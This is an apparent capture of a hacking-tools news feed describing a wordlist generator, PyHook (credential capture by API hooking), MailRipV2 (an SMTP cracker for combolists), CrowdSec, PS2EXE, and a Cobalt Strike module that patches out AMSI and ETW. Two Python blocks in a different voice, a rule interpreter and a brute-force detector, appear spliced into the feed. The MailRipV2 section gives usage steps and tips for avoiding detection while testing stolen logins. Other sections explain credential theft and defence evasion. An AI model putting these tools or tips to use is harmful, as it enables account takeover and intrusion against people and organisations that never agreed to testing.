RSS Security

Today, 22 September 2021 (KitPloit - PenTest & Hacking Tools)

Weakpass - Rule-Based Online Generator To Create A Wordlist Based On A Set Of Words

21 September 2021 at 11:30
By: Zion3R


The tool generates a wordlist based on a set of words entered by the user.


For example, during penetration testing you need to gain access to some service, device, account or Wi-Fi network that is password protected; say it is the Wi-Fi network of EvilCorp. Often a password is a combination of the device/network/organization name with some date, special character, etc. It is therefore simpler and quicker to test such combinations before launching more complex and time-consuming checks. Cracking a Wi-Fi password with a generic wordlist, for example, can take several hours and still fail, even with a great wordlist, because the actual password, such as Evilcorp2019, was not in it.

Therefore, using the generated wordlist, it is possible to organize a targeted and effective online password check.

Link: https://zzzteph.github.io/weakpass/

Secondary: https://weakpass.com/generate


Features

The hashcat rule syntax is used to generate the wordlist. By default, the generator uses a set of rules "online.rule", which performs the following mutations:

  1. Adding special characters and popular endings to the end of the word - !, @, !@#, 123! etc. - evilcorp!, evilcorp!123
  2. Adding digits from 1 to 31, from 01 to 12 - evilcorp01, evilcorp12.
  3. Adding the date 2018-2023 - evilcorp2018, evilcorp2019
  4. Various combinations of 1-3 - evilcorp2018!
  5. Capitalize the first letter and lower the rest, apply 1-4. Evilcorp!2021

As a result, for the word evilcorp, 216 passwords are generated in total, including:

  • evilcorp
  • Evilcorp
  • EVILCORP
  • evilcorp123456
  • evilcorp2018
  • Evilcorp!2021
  • Evilcorp!2022
  • evilcorp!@#

You can use your own hashcat rules: click "Show rules" and paste the rules you prefer into the "Rules" textarea. Supported rules (source: https://hashcat.net/wiki/doku.php?id=rule_based_attack):

Name               Function  Description                                          Example Rule  Input Word  Output Word
Nothing            :         Do nothing (passthrough)                             :             p@ssW0rd    p@ssW0rd
Lowercase          l         Lowercase all letters                                l             p@ssW0rd    p@ssw0rd
Uppercase          u         Uppercase all letters                                u             p@ssW0rd    P@SSW0RD
Capitalize         c         Capitalize the first letter and lower the rest       c             p@ssW0rd    P@ssw0rd
Invert Capitalize  C         Lowercase first found character, uppercase the rest  C             p@ssW0rd    p@SSW0RD
Toggle Case        t         Toggle the case of all characters in word            t             p@ssW0rd    P@SSw0RD
Toggle @           TN        Toggle the case of characters at position N          T3            p@ssW0rd    p@sSW0rd
Reverse            r         Reverse the entire word                              r             p@ssW0rd    dr0Wss@p
Duplicate          d         Duplicate entire word                                d             p@ssW0rd    p@ssW0rdp@ssW0rd
Duplicate N        pN        Append duplicated word N times                       p2            p@ssW0rd    p@ssW0rdp@ssW0rdp@ssW0rd
Reflect            f         Duplicate word reversed                              f             p@ssW0rd    p@ssW0rddr0Wss@p
Rotate Left        {         Rotate the word left                                 {             p@ssW0rd    @ssW0rdp
Rotate Right       }         Rotate the word right                                }             p@ssW0rd    dp@ssW0r
Append Character   $X        Append character X to end                            $1            p@ssW0rd    p@ssW0rd1
Prepend Character  ^X        Prepend character X to front                         ^1            p@ssW0rd    1p@ssW0rd
Truncate left      [         Delete first character                               [             p@ssW0rd    @ssW0rd
Truncate right     ]         Delete last character                                ]             p@ssW0rd    p@ssW0r
Delete @ N         DN        Delete character at position N                       D3            p@ssW0rd    p@sW0rd
Extract range      xNM       Extract M characters, starting at position N         x04           p@ssW0rd    p@ss
Omit range         ONM       Delete M characters, starting at position N          O12           p@ssW0rd    psW0rd
Insert @ N         iNX       Insert character X at position N                     i4!           p@ssW0rd    p@ss!W0rd
Overwrite @ N      oNX       Overwrite character at position N with X             o3$           p@ssW0rd    p@s$W0rd
Truncate @ N       'N        Truncate word at position N                          '6            p@ssW0rd    p@ssW0
Replace            sXY       Replace all instances of X with Y                    ss$           p@ssW0rd    p@$$W0rd
Purge              @X        Purge all instances of X                             @s            p@ssW0rd    p@W0rd
Duplicate first N  zN        Duplicate first character N times                    z2            p@ssW0rd    ppp@ssW0rd
Duplicate last N   ZN        Duplicate last character N times                     Z2            p@ssW0rd    p@ssW0rddd
Duplicate all      q         Duplicate every character                            q             p@ssW0rd    pp@@ssssWW00rrdd

The generator automatically removes duplicate passwords.

With the Wi-Fi toggle enabled, all passwords shorter than 8 characters are removed automatically.

All data is generated in the browser with JavaScript, so the generator works without internet access.
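Added example (not weakpass's own code, which runs in the browser as JavaScript): a small Python interpreter for the rule functions tabulated above, combined with the de-duplication and minimum-length filter just described. It is written from the defensive side: the same generator that produces candidates for a targeted check also tells you whether a proposed password is one rule application away from a word on your organisation's block list. SAMPLE_RULES is a constructed rule set in hashcat syntax, not the contents of online.rule, and all function names are my own.

```python
# Constructed sample rules in hashcat syntax, reproducing a few of the mutations
# listed above. These are NOT the contents of weakpass's online.rule.
SAMPLE_RULES = [":", "c", "u", "$!", "$1 $2 $3", "$2 $0 $1 $9", "c $! $2 $0 $2 $1"]

# Rule functions that take no argument: function character -> transformation.
SIMPLE = {":": lambda w: w, "l": str.lower, "u": str.upper, "t": str.swapcase,
          "c": lambda w: w[:1].upper() + w[1:].lower(),   # Capitalize
          "C": lambda w: w[:1].lower() + w[1:].upper(),   # Invert Capitalize
          "r": lambda w: w[::-1], "d": lambda w: w * 2, "f": lambda w: w + w[::-1],
          "{": lambda w: w[1:] + w[:1], "}": lambda w: w[-1:] + w[:-1],
          "[": lambda w: w[1:], "]": lambda w: w[:-1],
          "q": lambda w: "".join(c * 2 for c in w)}


def _pos(ch):
    """Positional arguments are single characters: 0-9, then A-Z for 10-35."""
    return int(ch, 36)


def apply_rule(word, rule):
    """Apply one rule line (functions, optionally space separated) to a word.
    A function whose position falls outside the word is a no-op, mirroring
    hashcat, which rejects a rule it cannot apply. Unknown functions raise."""
    w, i, n = word, 0, len(rule)

    def arg():
        nonlocal i
        if i >= n:
            raise ValueError(f"rule {rule!r}: missing argument")
        i += 1
        return rule[i - 1]

    while i < n:
        f = rule[i]
        i += 1
        if f == " ":
            continue
        if f in SIMPLE:
            w = SIMPLE[f](w)
        elif f == "T":                                 # Toggle @ N
            p = _pos(arg())
            w = w[:p] + w[p].swapcase() + w[p + 1:] if p < len(w) else w
        elif f == "p":                                 # Duplicate N
            w = w * (_pos(arg()) + 1)
        elif f == "$":                                 # Append Character
            w = w + arg()
        elif f == "^":                                 # Prepend Character
            w = arg() + w
        elif f == "D":                                 # Delete @ N
            p = _pos(arg())
            w = w[:p] + w[p + 1:] if p < len(w) else w
        elif f == "x":                                 # Extract range
            p, m = _pos(arg()), _pos(arg())
            w = w[p:p + m] if p + m <= len(w) else w
        elif f == "O":                                 # Omit range
            p, m = _pos(arg()), _pos(arg())
            w = w[:p] + w[p + m:] if p + m <= len(w) else w
        elif f == "i":                                 # Insert @ N
            p, x = _pos(arg()), arg()
            w = w[:p] + x + w[p:] if p <= len(w) else w
        elif f == "o":                                 # Overwrite @ N
            p, x = _pos(arg()), arg()
            w = w[:p] + x + w[p + 1:] if p < len(w) else w
        elif f == "'":                                 # Truncate @ N
            w = w[:_pos(arg())]
        elif f == "s":                                 # Replace
            x, y = arg(), arg()
            w = w.replace(x, y)
        elif f == "@":                                 # Purge
            w = w.replace(arg(), "")
        elif f == "z":                                 # Duplicate first N
            w = w[:1] * _pos(arg()) + w
        elif f == "Z":                                 # Duplicate last N
            w = w + w[-1:] * _pos(arg())
        else:
            raise ValueError(f"unsupported rule function {f!r} in {rule!r}")
    return w


def generate_wordlist(words, rules, min_length=0):
    """Every rule applied to every word; duplicates dropped (first occurrence
    wins) and candidates shorter than min_length removed, as the generator's
    Wi-Fi toggle does with 8."""
    seen, out = set(), []
    for word in words:
        for rule in rules:
            cand = apply_rule(word, rule)
            if len(cand) >= min_length and cand not in seen:
                seen.add(cand)
                out.append(cand)
    return out


def is_trivial_variant(candidate, words, rules):
    """Defensive use: reject a proposed password that is one rule application
    away from a blocked word (company name, product, SSID, ...)."""
    return candidate in set(generate_wordlist(words, rules))
```

Calling generate_wordlist(["evilcorp"], SAMPLE_RULES, min_length=8) yields the same kind of list the page shows (evilcorp, Evilcorp, EVILCORP, evilcorp!, ..., Evilcorp!2021). Feeding a password policy check with is_trivial_variant and the real online.rule, plus your own organisation's names, catches exactly the passwords this generator would find first.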


How-to



  1. To generate a wordlist, enter into the Words field the words that might be used as part of the password.
  2. Click on the Generate button
  3. Copy the received content or click on the Copy to clipboard button for automatic copying.
  4. ...
  5. Profit!


Yesterday, 21 September 2021 (KitPloit - PenTest & Hacking Tools)

PyHook - An Offensive API Hooking Tool Written In Python Designed To Catch Various Credentials Within The API Call

21 September 2021 at 20:30
By: Zion3R


PyHook is the Python implementation of my SharpHook project. It uses various API hooks in order to give us the desired credentials.

PyHook uses Frida to inject its dependencies into the target process.


Supported Processes
Process                API Call                         Description                                                                                         Progress
mstsc                  CredUnPackAuthenticationBufferW  Hooks into mstsc and should give you the username and password                                      DONE
runas                  CreateProcessWithLogonW          Hooks into runas and should give you the username, password and domain name                          DONE
cmd                    RtlInitUnicodeStringEx           Hooks into cmd and can then filter keywords such as PsExec, password, etc.                            DONE
MobaXterm              CharUpperBuffA                   Hooks into MobaXterm and should give you credentials for SSH and RDP logins                           DONE
explorer (UAC Prompt)  CredUnPackAuthenticationBufferW  Hooks into explorer and should give you the username, password and domain name from the UAC prompt   DONE


Link to my blog post covering this topic: https://ilankalendarov.github.io/posts/offensive-hooking



MailRipV2 - Improved SMTP Checker / SMTP Cracker With Proxy-Support, Inbox Test And Many More Features

21 September 2021 at 11:30
By: Zion3R


Your SMTP checker / SMTP cracker for mailpass combolists, including features like proxy support (SOCKS4 / SOCKS5) with automatic proxy scraper and checker, e-mail delivery / inbox check and DNS lookup for unknown SMTP hosts. Made for easy usage and always working!


Overview

Legal Notices

You are ONLY allowed to use the following code for educational purposes! Mail.Rip V2 shall not be used for any kind of illegal activity nor law enforcement at any time. This restriction applies to all cases of usage, no matter whether the code as a whole or only parts of it are being used.

By downloading and / or using any part of the code and / or any file of this repository, you agree to this restriction without remarks.


Features

Mail.Rip V2 is an SMTP checker / SMTP cracker written in Python 3.8. Using "smtplib", it lets you check common mailpass combolists for valid SMTP logins. It includes dictionaries and lists with the details of common email providers as well as the most common ports used by SMTP servers. Where data is missing, "dnspython" is used to look up unknown SMTP hosts in MX records.

Moreover, Mail.Rip V2 comes with SOCKS proxy support, including a proxy scraper and checker function. If proxy support is activated, the checker / cracker scrapes SOCKS4 or SOCKS5 proxies from common online sources and then checks the results. The working proxies are used at random. You can add new sources by editing library.json at any time.

Last but not least, Mail.Rip V2 includes an email delivery test / inbox check for found SMTP logins. For every valid combo, it tries to send a plain text email with the found SMTP login. All test messages are sent to your own user-defined receiving address whereby the content of the test emails is generated randomly. The templates can be edited in the "library.json", too.

Mail.Rip V2 is fully functional and ready to use!


How-to use Mail.Rip V2

Mail.Rip V2 has been written and tested with Python 3.8. It should run on any OS as long as Python and all dependencies are installed.
Just follow the steps below!


Installing needed Python modules

All Python modules / packages needed are listed in the txt-file requirements.txt. For an easy installation, type:

pip3 install -r requirements.txt

Installing any missing dependencies may take some time. Be patient, please.


Start the Checker / Cracker

With all dependencies being installed, you can start Mail.Rip V2 with:

python3 MailRipV2.py

No extra arguments are needed. You only need to copy your combofile into the same directory before starting the checker / cracker. After starting it, just follow the steps from (1) to (4). For more information see "Options in Main Menu".

Please regard:
Your combofile needs to be encoded with utf-8! Any other encoding may cause errors.


Options in Main Menu

[1] Set Default Values

Use this option to edit the default values for Mail.Rip V2. You can edit the following here:

  • Amount of threads to use for checking / cracking.
  • Default timeout for connections.
  • De-/activate the blacklist check for email domains.
  • Set your email address as receiver for test messages.


[2] De-/Activate Proxy-Support

This option lets you activate or deactivate proxy support. If activated, you will be asked for the proxy type to use; just enter SOCKS4 or SOCKS5. The scraper then starts automatically. You can add more sources by editing library.json. After scraping is done, you will be asked whether you want to skip the checker. DO NOT SKIP THE CHECKER unless you really, really need to start an attack immediately.


[3] Load Combos

Option #3 starts the Comboloader. Enter the name of your combofile, for example: combos.txt. All combos in the file will be loaded and prepared for an attack. To do so, the Comboloader performs the following steps:

  • Any other separator than ":" is replaced.
  • The email address in the combo is verified by its format using regular expressions.
  • For verified email addresses, the domain is checked against the blacklist included in library.json.
  • Then, the loader checks whether it has already loaded the given combo before (duplicates check).

All combos passing the checks will be loaded for an attack and saved to a txt-file called targets.txt. Please make sure that your combofile is encoded with utf-8 or errors may occur.


[4] Start Attack

This one is obvious.


Various

See the sections below for any tips, hints and other information.


SMTP cracking / SMTP checking process

Mail.Rip V2 uses the smtplib for the checking / cracking process. The "magic" is done this way:

  1. The SMTP cracker / SMTP checker reads the next combo from the loaded list.
  2. It looks up the email domain in the "smtphost" dictionary to find the SMTP host to attack.
  3. For unknown hosts, it tries to get the address from the MX records of the email domain.
  4. For a host found via MX records, the connection port is determined by trying the most common ports one after another.
  5. It then establishes a connection to the SMTP host (trying SSL and non-SSL as well as TLS)
  6. and sends the login data, using the target email address and the password from the combo.
  7. If the login is denied, the cracker / checker tries to log in with the user ID (the email address without the @... part) and the password.
  8. If the login data is valid, the so-called "hit" is saved to a txt file.
  9. Finally, Mail.Rip V2 tries to send a test message to you using the found SMTP login.

For best results, every user should edit the host information in library.json before starting Mail.Rip V2 for the first time. Adding the data of the most common e-mail providers in a combolist will always speed up the checking / cracking process, and it will probably raise fewer security flags on the server side.

Other ways to improve your results are deactivating proxy support and adjusting the default values. In fact, IT IS RECOMMENDED TO LEAVE THE PROXY-SUPPORT DEACTIVATED. Without proxies you will get much better results, for the checker as well as for the inbox check.


Notes on the email delivery test (inbox check)

The email content is generated randomly using templates in the "library.json". Edit those templates for your needs. Editing the templates from time to time will provide a higher success rate.

Always bear in mind that the email delivery test may return false negatives for many reasons. It only confirms that the given SMTP host can be used for sending emails with any software. Well-known email providers may block or restrict access to SMTP accounts, especially for tools like Mail.Rip V2. Moreover, free proxies may be blacklisted, as may the SMTP account itself. Valid logins for which the delivery test failed should be tested again after the attack has finished.


Notes on the blacklist check

library.json includes a blacklist of email domains. More than 500 trashmail domains have been added to it, but some very popular email providers are on it as well. Those providers are usually a waste of time when checking or cracking mailpass combolists: sometimes they simply block access, sometimes they ask for further verification.

If you want to attack those providers, too, edit the blacklist for your needs.


Support Mail.Rip V2

If you like Mail.Rip V2 support it, please! Every donation helps. Or just buy me coffee! The more coffee I drink the more time I can spend on projects like this one. Just use the wallets (BTC / LTC) below for your donation. All donations are appreciated - no matter how much you send. A single Dollar can keep me awake for one or two hours ... ;-)


Donation wallets

  • BTC (Bitcoin): 1CU8WukMCDmeBfqJpsR4Vq9kxvNiRdYhf5
  • LTC (Litecoin): LeJsHzcMixhvR1qEfgHJU32joVAJDgQwR7


Last Update

2021-03-27: release X - FINAL VERSION! See commit comments for further details.



Before yesterday (KitPloit - PenTest & Hacking Tools)

CrowdSec - An Open-Source Massively Multiplayer Firewall Able To Analyze Visitor Behavior And Provide An Adapted Response To All Kinds Of Attacks

20 September 2021 at 20:30
By: Zion3R


CrowdSec is a free, modern and collaborative behavior detection engine, coupled with a global IP reputation network. It builds on fail2ban's philosophy but is IPv6 compatible and 60x faster (Go vs Python), uses Grok patterns to parse logs and YAML scenarios to identify behaviors. CrowdSec is engineered for modern cloud / container / VM based infrastructures (by decoupling detection and remediation). Once a threat is detected you can remedy it with various bouncers (firewall block, nginx HTTP 403, captchas, etc.), while the aggressive IP can be sent to CrowdSec for curation before being shared with all users to further improve everyone's security. See the FAQ or read below for more.


2 mins install

Installing it through the Package system of your OS is the easiest way to proceed. Otherwise, you can install it from source.


From package (Debian)
curl -s https://packagecloud.io/install/repositories/crowdsec/crowdsec/script.deb.sh | sudo bash
sudo apt-get update
sudo apt-get install crowdsec

From package (rhel/centos/amazon linux)
curl -s https://packagecloud.io/install/repositories/crowdsec/crowdsec/script.rpm.sh | sudo bash
yum install crowdsec

From package (FreeBSD)
sudo pkg update
sudo pkg install crowdsec

From source
wget https://github.com/crowdsecurity/crowdsec/releases/latest/download/crowdsec-release.tgz
tar xzvf crowdsec-release.tgz
cd crowdsec-v* && sudo ./wizard.sh -i

About the CrowdSec project

CrowdSec is open-source, lightweight software that detects peers with aggressive behaviors and prevents them from accessing your systems. Its user-friendly design and assistance offer a low technical barrier to entry and nevertheless a high security gain.

Processing is done in 4 steps:


Once an unwanted behavior is detected, deal with it through a bouncer. The aggressive IP, scenario triggered and timestamp are sent for curation, to avoid poisoning & false positives. (This can be disabled). If verified, this IP is then redistributed to all CrowdSec users running the same scenario.


Outnumbering hackers all together

By sharing the threats they faced, all users protect each other (hence the name Crowd-Security). CrowdSec is designed for modern infrastructures, with its "Detect Here, Remedy There" approach, letting you analyse logs coming from several sources in one place and block threats at various levels (application, system, infrastructure) of your stack.

CrowdSec ships by default with scenarios (brute force, port scan, web scan, etc.) adapted to most contexts, but you can easily extend it by picking more from the Hub. It is also easy to adapt an existing one or create one yourself.
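The SMTP checking process described in the Mail.Rip V2 section above (many SASL authentication failures from one address in quick succession, with retries across mechanisms and user-ID variants) is the kind of behaviour the log-parsing, scenario-based detection described here exists to catch. As an added illustration that is not CrowdSec's code and does not use its scenario format, the following Python applies a Grok-style parse pattern and a per-IP leaky bucket to constructed Postfix-style log lines and emits only the three fields the text says are shared (IP, scenario, timestamp). The log lines, the capacity and the leak rate are made up for the example; tune them to your own MTA's log format and traffic.

```python
import re
from dataclasses import dataclass
from datetime import datetime
from typing import Dict, List, Optional, Tuple

# Grok-style pattern for a Postfix SASL authentication failure (constructed
# format; adapt it to the exact wording your MTA logs).
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ postfix/smtpd\[\d+\]: "
    r"warning: [^\s\[]+\[(?P<ip>[0-9a-fA-F.:]+)\]: SASL (?P<mech>\w+) authentication failed"
)

# Constructed sample log: one address hammering LOGIN/PLAIN, one user mistyping
# twice minutes apart, one IPv6 address failing once, and an unrelated line.
SAMPLE_LOG = """\
Sep 21 11:29:40 mx postfix/smtpd[1234]: connect from unknown[203.0.113.7]
Sep 21 11:30:01 mx postfix/smtpd[1234]: warning: unknown[203.0.113.7]: SASL LOGIN authentication failed: authentication failure
Sep 21 11:30:02 mx postfix/smtpd[1234]: warning: unknown[203.0.113.7]: SASL PLAIN authentication failed: authentication failure
Sep 21 11:30:03 mx postfix/smtpd[1234]: warning: unknown[203.0.113.7]: SASL LOGIN authentication failed: authentication failure
Sep 21 11:30:04 mx postfix/smtpd[1234]: warning: unknown[203.0.113.7]: SASL LOGIN authentication failed: authentication failure
Sep 21 11:30:05 mx postfix/smtpd[1234]: warning: unknown[203.0.113.7]: SASL PLAIN authentication failed: authentication failure
Sep 21 11:30:06 mx postfix/smtpd[1234]: warning: unknown[203.0.113.7]: SASL LOGIN authentication failed: authentication failure
Sep 21 11:30:07 mx postfix/smtpd[1234]: warning: unknown[203.0.113.7]: SASL LOGIN authentication failed: authentication failure
Sep 21 11:31:10 mx postfix/smtpd[1240]: warning: host.example[198.51.100.20]: SASL LOGIN authentication failed: authentication failure
Sep 21 11:35:12 mx postfix/smtpd[1240]: warning: host.example[198.51.100.20]: SASL LOGIN authentication failed: authentication failure
Sep 21 11:36:00 mx postfix/smtpd[1242]: warning: unknown[2001:db8::5]: SASL LOGIN authentication failed: authentication failure
"""


def parse_ts(ts: str) -> datetime:
    """Syslog timestamps carry no year; only deltas within one log matter here."""
    return datetime.strptime(" ".join(ts.split()), "%b %d %H:%M:%S")


@dataclass
class Bucket:
    level: float = 0.0
    last: Optional[datetime] = None


def detect(log_text: str, capacity: float = 5, leak_per_sec: float = 0.1,
           scenario: str = "smtp-bruteforce") -> List[Tuple[str, str, str]]:
    """Leaky bucket per source IP: each failure adds one unit, the bucket drains
    leak_per_sec units per second, and overflowing capacity raises an alert.
    Returns (ip, scenario, timestamp) tuples, the minimal signal the text
    describes being shared for curation."""
    buckets: Dict[str, Bucket] = {}
    alerts: List[Tuple[str, str, str]] = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, ip = parse_ts(m["ts"]), m["ip"]
        b = buckets.setdefault(ip, Bucket())
        if b.last is not None:
            b.level = max(0.0, b.level - (ts - b.last).total_seconds() * leak_per_sec)
        b.last = ts
        b.level += 1.0
        if b.level > capacity:
            alerts.append((ip, scenario, m["ts"]))
            b.level = 0.0  # one alert per burst; a real engine would also start a ban timer here
    return alerts


if __name__ == "__main__":
    for ip, scenario, when in detect(SAMPLE_LOG):
        print(f"{when} {scenario} {ip}")
```

With the defaults, only 203.0.113.7 overflows (on its sixth failure in six seconds); the user who mistypes twice four minutes apart and the single IPv6 failure never reach the threshold, which is the point of draining the bucket over time rather than counting failures outright.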


What it is not

CrowdSec is not a SIEM, storing your logs (neither locally nor remotely). Your data are analyzed locally and forgotten.

Signals sent to the curation platform are limited to the very strict minimum: IP, Scenario, Timestamp. They are only used to allow the system to spot new rogue IPs, rule out false positives or poisoning attempts.


Install it!

CrowdSec is available for various platforms (see the package and source instructions above), or look directly at the installation documentation for other methods and platforms.



PS2EXE - Module To Compile Powershell Scripts To Executables

20 September 2021 at 11:30
By: Zion3R


A rework of Ingo Karstein's great script with GUI support. GUI output and input are activated with a single switch, and real Windows executables are generated. With PowerShell 5.x support and a graphical front end.

Module version.


You can find the script-based version here (https://github.com/MScholtes/TechNet-Gallery) and here: PS2EXE-GUI: "Convert" PowerShell Scripts to EXE Files with GUI.

Author: Markus Scholtes

Version: 1.0.10

Date: 2021-04-10


Installation
PS C:\> Install-Module ps2exe

(on PowerShell V4 you may have to install PowerShellGet first) or download it from here: https://www.powershellgallery.com/packages/ps2exe/.


Usage
  Invoke-ps2exe .\source.ps1 .\target.exe

or

  ps2exe .\source.ps1 .\target.exe

compiles "source.ps1" into the executable target.exe (if ".\target.exe" is omitted, output is written to ".\source.exe").

or start Win-PS2EXE for a graphical front end with

  Win-PS2EXE

Parameter
ps2exe [-inputFile] '<file_name>' [[-outputFile] '<file_name>'] [-prepareDebug]
[-x86|-x64] [-lcid <id>] [-STA|-MTA] [-noConsole] [-UNICODEEncoding]
[-credentialGUI] [-iconFile '<filename>'] [-title '<title>'] [-description '<description>']
[-company '<company>'] [-product '<product>'] [-copyright '<copyright>'] [-trademark '<trademark>']
[-version '<version>'] [-configFile] [-noOutput] [-noError] [-noVisualStyles] [-requireAdmin]
[-supportOS] [-virtualize] [-longPaths]
inputFile = Powershell script that you want to convert to executable (file has to be UTF8 or UTF16 encoded)
outputFile = destination executable file name or folder, defaults to inputFile with extension '.exe'
prepareDebug = create helpful information for debugging
x86 or x64 = compile for 32-bit or 64-bit runtime only
lcid = location ID for the compiled executable. Current user culture if not specified
STA or MTA = 'Single Thread Apartment' or 'Multi Thread Apartment' mode
noConsole = the resulting executable will be a Windows Forms app without a console window
UNICODEEncoding = encode output as UNICODE in console mode
credentialGUI = use GUI for prompting credentials in console mode
iconFile = icon file name for the compiled executable
title = title information (displayed in details tab of Windows Explorer's properties dialog)
description = description information (not displayed, but embedded in executable)
company = company information (not displayed, but embedded in executable)
product = product information (displayed in details tab of Windows Explorer's properties dialog)
copyright = copyright information (displayed in details tab of Windows Explorer's properties dialog)
trademark = trademark information (displayed in details tab of Windows Explorer's properties dialog)
version = version information (displayed in details tab of Windows Explorer's properties dialog)
configFile = write config file (<outputfile>.exe.config)
noOutput = the resulting executable will generate no standard output (includes verbose and information channel)
noError = the resulting executable will generate no error output (includes warning and debug channel)
noVisualStyles = disable visual styles for a generated windows GUI application (only with -noConsole)
requireAdmin = if UAC is enabled, compiled executable run only in elevated context (UAC dialog appears if required)
supportOS = use functions of newest Windows versions (execute [Environment]::OSVersion to see the difference)
virtualize = application virtualization is activated (forcing x86 runtime)
longPaths = enable long paths ( > 260 characters) if enabled on OS (works only with Windows 10)

A generated executable has the following reserved parameters:

-debug               Forces the executable to be debugged. It calls "System.Diagnostics.Debugger.Launch()".
-extract:<FILENAME>  Extracts the PowerShell script inside the executable and saves it as FILENAME. The script will not be executed.
-wait                At the end of the script execution it writes "Hit any key to exit..." and waits for a key to be pressed.
-end                 All following options will be passed to the script inside the executable. All preceding options are used by the executable itself and will not be passed to the script.

Remarks

List of cmdlets not implemented:

The basic input/output commands had to be rewritten in C# for PS2EXE. Not implemented are Write-Progress in console mode (too much work) and Start-Transcript/Stop-Transcript (no proper reference implementation by Microsoft).


GUI mode output formatting:

By default, PowerShell formats cmdlet output line by line (as an array of strings). When your command generates 10 lines of output and you use GUI output, 10 message boxes will appear, each waiting for an OK. To prevent this, pipe your command to the cmdlet Out-String. This converts the output to one string with 10 lines, so all output is shown in one message box (for example: dir C:\ | Out-String).


Config files:

PS2EXE can create config files named after the generated executable plus ".config". In most cases these config files are not necessary; they are a manifest that tells which .NET Framework version should be used. As you will usually use the current .NET Framework, try running your executable without the config file.


Parameter processing:

Compiled scripts process parameters like the original script does. One restriction comes from the Windows environment: for all executables all parameters have the type STRING, if there is no implicit conversion for your parameter type you have to convert explicitly in your script. You can even pipe content to the executable with the same restriction (all piped values have the type STRING).


Password security:

Never store passwords in your compiled script! One can simply decompile the script with the parameter -extract. For example

Output.exe -extract:C:\Output.ps1

will decompile the script stored in Output.exe.


Script variables:

Since PS2EXE converts a script to an executable, script-related variables are no longer available. In particular, the variable $PSScriptRoot is empty.

The variable $MyInvocation is set to other values than in a script.

You can retrieve the script/executable path independent of whether it is compiled or not with the following code (thanks to JacquesFS):

if ($MyInvocation.MyCommand.CommandType -eq "ExternalScript") {
    # running as a .ps1 script
    $ScriptPath = Split-Path -Parent -Path $MyInvocation.MyCommand.Definition
} else {
    # running as a compiled executable
    $ScriptPath = Split-Path -Parent -Path ([Environment]::GetCommandLineArgs()[0])
    if (!$ScriptPath) { $ScriptPath = "." }
}

Window in background in -noConsole mode:

When an external window is opened in a script with -noConsole mode (i.e. for Get-Credential or for a command that needs a cmd.exe shell) the next window is opened in the background.

The reason for this is that on closing the external window, Windows tries to activate the parent window. Since the compiled script has no window, the parent window of the compiled script is activated instead, normally the window of Explorer or PowerShell.

To work around this, $Host.UI.RawUI.FlushInputBuffer() opens an invisible window that can be activated. The following call of $Host.UI.RawUI.FlushInputBuffer() closes this window (and so on).

The following example will not open a window in the background anymore as a single call of "ipconfig | Out-String" will do:

$Host.UI.RawUI.FlushInputBuffer()
ipconfig | Out-String
$Host.UI.RawUI.FlushInputBuffer()

Changes:

1.0.10 / 2021-04-10
  • parameter outputFile now accepts a target folder (without filename)

1.0.9 / 2021-02-28
  • new parameter UNICODEEncoding to output as UNICODE
  • changed parameter debug to prepareDebug
  • finally dared to use advanced parameters

1.0.8 / 2020-10-24
  • refactored

1.0.7 / 2020-08-21
  • bug fix for simultaneous progress bars in one pipeline

1.0.6 / 2020-08-10
  • prompt for choice behaves like Powershell now (console mode only)
  • (limited) support for Powershell Core (starts Windows Powershell in the background)
  • fixed processing of negative parameter values
  • support for animated progress bars (noConsole mode only)

1.0.5 / 2020-07-11
  • support for nested progress bars (noConsole mode only)

1.0.4 / 2020-04-19
  • Application.EnableVisualStyles() as default for GUI applications, new parameter -noVisualStyles to prevent this

1.0.3 / 2020-02-15
  • converted files from UTF-16 to UTF-8 to allow git diff
  • ignore control keys in secure string request in console mode

1.0.2 / 2020-01-08
  • added examples to github

1.0.1 / 2019-12-16
  • fixed "unlimited window width for GUI windows" issue in ps2exe.ps1 and Win-PS2EXE

1.0.0 / 2019-11-08
  • first stable module version

0.0.0 / 2019-09-15
  • experimental


InlineExecute-Assembly - A PoC Beacon Object File (BOF) That Allows Security Professionals To Perform In Process .NET Assembly Execution

19 September 2021 at 20:30
By: Zion3R


InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in-process .NET assembly execution as an alternative to Cobalt Strike's traditional fork-and-run execute-assembly module. InlineExecute-Assembly will execute any assembly with the entry point Main(string[] args) or Main(). This should allow you to run most released tooling without any prior modification.

The BOF automatically determines which Common Language Runtime (CLR) needs to be loaded into the process for your assembly (v2.0.50727 or v4.0.30319) prior to execution and, in most cases, should exit gracefully if any issues arise. The BOF also supports several flags that let the operator dictate behaviour prior to .NET execution: disabling AMSI via in-memory patching, disabling and restoring ETW via in-memory patching, customizing the name of the CLR AppDomain to be created, whether to direct the console output of your assembly to a named pipe or a mailslot, and switching the default entry point from Main(string[] args) to Main(). More details on usage, use cases and possible detections can be found below and at https://securityintelligence.com/posts/net-execution-inlineexecute-assembly/.

Lastly the advantage of executing our .NET assemblies in the same process as our beacon implant is that we avoid the default behavior of Cobalt Strike's execute-assembly module which creates a new process to then load/inject the CLR/.NET assembly. However, other opsec considerations still exist, for example, does the process we are executing within normally load the CLR or does the .NET assembly we are executing have any known signatures? Therefore, the disadvantage is that if something does get detected and killed, for example by AMSI, your beacon is also killed.


Subject References

This tool wouldn't exist without being able to piggyback off some really great research, tools, and code already published by members of the security community. So thank you. Lastly, if you feel anyone has been left out below, please let me know and I will be sure to get them added.

  • HostingCLR - here - CLR/Executing assembly logic
  • Dotnet-Loader-Shellcode - (by @modexpblog) - here - All around great research including on COM Interfaces for executing .NET in C -> Real MVP
  • Donut - (by @TheRealWover and @modexpblog) - here - COM Interfaces Header
  • Memory Patching AMSI Bypass - (by @_RastaMouse) - here - AMSI memory patching research
  • Metasploit-Execute-Assembly - (by @b4rtik) - here - Modified AMSI patching and used find .NET version function
  • ExecuteAssembly - (by @med0x2e)- here - Modified aggressor script
  • Hiding Your .NET ETW - (by @xpn) - here - Great ETW research
  • ETW BOF - (by @ajpc500)- here - Modified ETW patching
  • ExecuteAssembly_Mailslot - (by @N4k3dTurtl3)- here - Modified using mailslots for console redirection
  • @freefirex2 - Was kind enough to share some good BOF inner workings and gotcha's.

Getting Started
  1. Copy the inlineExecute-Assembly folder with all of its contents to a system you plan to connect with via the Cobalt Strike GUI application.
  2. Load in the inlineExecute-Assembly.cna Aggressor script
